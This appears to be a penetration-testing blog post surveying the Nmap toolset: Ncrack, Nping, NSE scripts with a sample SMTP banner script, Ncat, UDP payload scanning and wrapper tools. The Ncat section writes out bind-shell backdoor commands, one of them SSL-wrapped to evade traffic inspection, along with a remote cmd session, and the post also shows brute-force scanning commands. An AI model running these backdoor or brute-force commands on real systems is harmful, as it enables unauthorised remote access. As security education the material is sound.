ncrack scanme.nmap.org/24 -p 22

Ncrack supports the following protocols:
Nping
In general, Hping's utility is to generate custom packets. Using hping is far easier than building custom packets in a scripting language like Python. A major drawback to Hping was its lack of inherent "scanner" type functionality: unless you created a bash wrapper or TCL script, it was a one-target tool. Nping fixes this in stellar fashion by supporting Nmap target syntax. Although Nmap has done its best to implement the type of scanning one would do with Hping/Nping, nothing beats having a command line tool to send custom packets. "Custom packets" is an ambiguous term; Hping has traditionally been used to test firewalls, evade IDS, send PoC/DoS packets, etc. Many have moved over to Scapy as it offers a bit more in the way of customization, but Nping is a welcome addition to the packet crafting toolbox.
NSE (Nmap Scripting Engine)
The Nmap Scripting Engine is a Lua framework for doing pretty much anything within nmap, with the power of nmap. If you think about it, it was a natural progression. Some bigtime firms I know have taken vuln scanners out of the rotation in their pentests, opting for specific targeted NSE scripts. In addition, NSE offers a lot to both netpen and webpen; a plethora of scripts are webpen based. There are a modest 194 scripts in SVN, but I know that not everyone is releasing their scripts, which imo hurts the project's awesomeness. Lame pentesters are lame. Here are some of our favs:
- banner - A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds. We’ve used this to scan large domains with services not in the nmap fingerprints database and pipe the output to files for later inspection.
- dns-cache-snoop - Performs DNS cache snooping against a DNS server. Replaces easy bash scripting, but nice.
- hostmap - Tries to find hostnames that resolve to the target’s IP address by querying the online database at http://www.bfk.de/bfk_dnslogger.html. Replaces Hostmap which is intermittently broken =(
- http-brute - Performs brute force password auditing against http basic authentication. Saves some time setting up Burp to do this.
- http-enum – Enumerates directories used by popular web applications and servers. WIN. We have ported many fingerprints we see often into http-enum’s fingerprint database (in fact we are credited in that source). Dirbuster and wfuzz are great and focus on large sets of common words for directory bruteforcing, we use http-enum for more targeted framework bruteforcing… and it works.
- smb-enum-shares - Attempts to list shares using the srvsvc.NetShareEnumAll MSRPC function and retrieve more information about them using srvsvc.NetShareGetInfo. If access to those functions is denied, a list of common share names is checked.
- smb-brute - Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. SMB is the weakest link… goodbye.
- smb-check-vulns - Checks for vulnerabilities: MS08-067, etc, etc.
- smb-psexec - This script implements remote process execution similar to Sysinternals' psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool on a range of systems, or even installing a backdoor on a collection of computers.
- As well as the more targeted SNMP, MSSQL, MYSQL, ORACLE, and Lotus enumeration and bruteforce scripts.
nmap -PN -sS -sV --script=vulscan -p25 www.target.com

PORT   STATE SERVICE REASON  VERSION
25/tcp open  smtp    syn-ack Exim smtpd 4.69
| vulscan: Exim Configuration File Variable Overflow
|  Exim sender_verify Function Remote Overflow
|  Exim header_syntax Function Remote Overflow
|  Exim Parenthesis File Name Filter Bypass
|  Exim -be Command Line Option host_aton Function Local Overflow
|  Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
|  Exim -bh Command Line Option dns_build_reverse Function Local Overflow

Nmap NSE and Metasploit have also bridged a bit through new functions implemented in Metasploit; check that out. Ron also has an experimental pwdump-like Nmap script that will dump password hashes and send them to your rainbow tables... effing eh...
So, NSE… get on it. Here are some links to get you hyped:
- Nmap's official video channel w/ scripting talk from Blackhat
- David Shaw’s Nmap Scripting Primer Video
- Ron Bowes' Nmap Scripting Presentation from BSides Ottawa
- Nmap NSE Hacking for IT Security Professionals presentation by Marc, who made vulscan (above)
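To show what writing one of these actually looks like, here is a small added example script, written for this article and not one of the scripts shipped in Nmap's tree. It grabs the SMTP greeting, pulls out the advertised software and version, and stashes them in the NSE registry the same way smb-brute stashes credentials for other scripts to pick up. The script name (smtp-greet), its script argument (smtp-greet.timeout) and the registry key are made up for the example; everything else is the standard NSE API (shortport, nmap.new_socket, stdnse).

```lua
-- smtp-greet.nse: added example for this article, not an Nmap-shipped script.
local nmap      = require "nmap"
local shortport = require "shortport"
local stdnse    = require "stdnse"

description = [[
Reads the SMTP greeting banner, extracts the advertised software name and
version, and records them in the NSE registry for later scripts or reports.
]]

author     = "Example for this article"
license    = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

-- Fire on ports Nmap identified as smtp, or 25/587 when -sV was not used.
portrule = shortport.port_or_service({25, 587}, "smtp")

action = function(host, port)
  -- Hypothetical script arg: nmap --script-args smtp-greet.timeout=3000
  local timeout = tonumber(stdnse.get_script_args("smtp-greet.timeout")) or 5000

  local socket = nmap.new_socket()
  socket:set_timeout(timeout)

  local ok, err = socket:connect(host, port)
  if not ok then
    stdnse.debug1("connect to %s:%d failed: %s", host.ip, port.number, err)
    return nil
  end

  -- SMTP servers speak first: "220 <host> ESMTP <software> <version> ..."
  local got, banner = socket:receive_lines(1)
  socket:send("QUIT\r\n")   -- be polite; the server closes after this
  socket:close()
  if not got then
    stdnse.debug1("no greeting from %s:%d", host.ip, port.number)
    return nil
  end

  banner = banner:gsub("[\r\n]+$", "")
  if not banner:match("^220") then
    return "Unexpected greeting: " .. banner
  end

  -- Pull "<name> <x.y[.z]>" out of e.g. "220 mx ESMTP Exim 4.69 Wed, ..."
  -- Servers that hide their version (e.g. a bare "ESMTP Postfix") yield nil.
  local software, version = banner:match("ESMTP%s+(%a+)%s+([%d%.]+)")

  -- Share the result with other scripts via the registry (key is made up here).
  nmap.registry.smtp_greet = nmap.registry.smtp_greet or {}
  nmap.registry.smtp_greet[host.ip] = {
    port = port.number, software = software, version = version, banner = banner,
  }

  local out = { "banner: " .. banner }
  if software then
    out[#out + 1] = ("software: %s %s"):format(software, version)
  end
  return stdnse.format_output(true, out)
end
```

Drop the file somewhere handy and run it with an explicit path, e.g. nmap -p25,587 --script ./smtp-greet.nse --script-args smtp-greet.timeout=3000 target; nmap --script-help ./smtp-greet.nse prints the description block above. Note the script only ever sends QUIT, which is why it can honestly sit in the "safe" category; anything that probes further (brute, intrusive) should be categorised accordingly so --script safe does not pick it up by surprise.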
Ncat
Ncat is Nmap's answer to Netcat. It does pretty much everything netcat can do and adds IPv6, UDP and SSL socket connections... no more stunnel! It also has hex output options, SOCKS4 and HTTP proxying, and built-in access control. Irongeek has a video basically showing all the flag actions in practice; you can find that here. Ncat also comes with a nifty --exec feature. Here we are SSL-wrapping our backdoor:

Backdoor ncat:
C:\Windows\System32> ncat -l --exec "cmd.exe" 1337

Connecting:
root@bt:~# ncat 192.168.1.2 1337
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\Windows\System32>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 00E1-F423

 Directory of c:\Windows\System32

04/15/2011 03:20 AM <DIR> .
04/15/2011 03:20 AM <DIR> ..
07/13/2009 10:37 PM <DIR> 0409
09/27/2010 10:33 AM <DIR> 1033

Traffic inspection of the backdoor before SSL:

SSL backdoor:
C:\Windows\System32> ncat -l --ssl --exec "cmd.exe" 1337

Connecting:
root@bt:~# ncat --ssl 192.168.1.2 1337

Traffic inspection of the "dir" command using the backdoor after SSL:

One caveat worth knowing: with no --ssl-cert/--ssl-key the listener generates a temporary self-signed certificate, and the client accepts whatever certificate it is shown unless you pass --ssl-verify (with --ssl-trustfile pointing at the listener's cert). So this setup keeps the command traffic out of the sniffer, but it authenticates neither end; anyone who finds port 1337 gets the same shell, which is exactly where the built-in access control (--allow) earns its keep.
Nmap UDP Payload Scanning
The problem with scanning UDP ports accurately is the nature of UDP programs themselves. Delivering anything other than a legitimate payload to a service usually results in a silently dropped packet, which for Nmap looks the same as a filtered port. This is bad news for pentesters, as we want a full and accurate scan of our targets. UDP payload scanning is the solution (most of the time). Instead of scanning with an empty UDP packet, we send a legitimate payload that the service we are scanning understands; if we receive a response, the port is open. Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace Jack), or udp-proto-scanner by Portcullis Labs. Although these tools are often stellar, they are sometimes buggy and lack the Nmap-type features we want in a port scanner.
Newer versions of Nmap fix that dilemma by adding the following UDP payloads for scanning:
- udp/7 echo
- udp/53 domain
- udp/111 rpcbind
- udp/123 ntp
- udp/137 netbios-ns
- udp/161 SNMP
- udp/177 xdmcp
- udp/500 ISAKMP
- udp/520 route
- udp/1645 RADIUS
- udp/1812 RADIUS
- udp/2049 NFS
- udp/5353 zeroconf
- udp/10080 amanda
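If the service you care about is not in that list, you do not have to wait for a release: the payloads live in the nmap-payloads file in Nmap's data directory and you can add your own. The entry below is an added example for this article, not an entry copied from Nmap's file. It sends the Source engine A2S_INFO query, which Steam-based game servers answer on udp/27015; check that the nmap-payloads shipped with your version does not already cover the port before adding it.

```text
# Source engine A2S_INFO query (udp/27015). Added example for this article;
# same line format as the entries Nmap ships: protocol, port list, quoted
# payload (continuation lines are concatenated).
udp 27015
  "\xff\xff\xff\xffTSource Engine Query\x00"
```

For a one-off probe you can skip editing the file entirely and hand the bytes to Nmap on the command line, e.g. nmap -sU -p27015 --data ffffffff54536f7572636520456e67696e6520517565727900 target; --data-string works the same way for payloads that are plain printable text.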
Auxiliary Nmap Scripts
There are several scripts for manipulating output and extending Nmap.
- fastNmap and npwn – Perl scripts for scanning large networks faster by cutting your scans into small tasks and analyzing large scan data in better fashion. I'm excited to use this on a cloud provider soon for some fast and furious /16 script scanning. Research project presentations (pdf's) here and here; fastnmap and npwn code here.
- Smap – Recently an interesting one I have played with is smap, an nmap wrapper that will take nmap output and run hosts through Nagios service checks as well. The author claims the checks are more accurate than Nmap's. Either way, I tested the wrapper against some local lab machines and it identified more HTTP servers and versions on non-standard ports than nmap did, and more accurately. Smap discussion here and download here.

root@bt:~/smap/scan_data/2011-04-26_16.15.29# cat report-hosts.log
Scan_results generated for 2011-04-26_16.15.29
--[ HOST - List ]--------
IP :: Port :: Service -> Server_Type
192.168.1.2 :: 10243 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP).
Ignored State: closed (12325)
192.168.1.2 :: 8834 :: http -> NessusWWW
192.168.1.2 :: 5357 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP).
192.168.1.2 :: 3389 :: microsoft-rdp -> Microsoft Terminal Service.
192.168.1.2 :: 3306 :: mysql -> MySQL (unauthorized).
192.168.1.2 :: 2869 :: icslap? -> .
192.168.1.2 :: 1241 :: ssl.nessus -> Nessus Daemon (NTP v1.2).
192.168.1.2 :: 1036 :: nsstp? -> .
192.168.1.2 :: 1035 :: multidropper? -> .
192.168.1.2 :: 1027 :: msrpc -> Microsoft Windows RPC.
192.168.1.2 :: 1026 :: LSA-or-nterm? -> .
192.168.1.2 :: 1025 :: msrpc -> Microsoft Windows RPC.
192.168.1.2 :: 990 :: ftps? -> .
192.168.1.2 :: 912 :: vmware-auth -> VMware Authentication Daemon 1.0 (Uses VNC
192.168.1.2 :: 554 :: rtsp? -> .
192.168.1.2 :: 445 :: netbios-ssn -> .
192.168.1.2 :: 443 :: ssl.http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl. v5.10.1).
192.168.1.2 :: 139 :: netbios-ssn -> .
192.168.1.2 :: 135 :: msrpc -> Microsoft Windows RPC.
192.168.1.2 :: 80 :: http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl. v5.10.1).

- Rainmap – Rainmap was a Summer of Code project to distribute nmap scanning among cloud servers and consolidate command and control through a single web GUI. The project was completed but is slated for a rewrite this SoC. To me it looks like it has too many moving parts and needs some more development, but it is out there.
- Nmap to SQL – Nmap lacks SQL output for some reason. A buddy of mine asked Fyodor why it's not there by default, and Fyodor told him to go read the Nmap book. He instead wrote his own, with more output than most of the comparable ones out there. Here.
- Nsploit – an XMLRPC bridge from nmap to Metasploit (yes, we know Armitage is cool; we prefer non-GUI apps). Learn more here.
- Droidmap – nmap for Android, still in development. Here.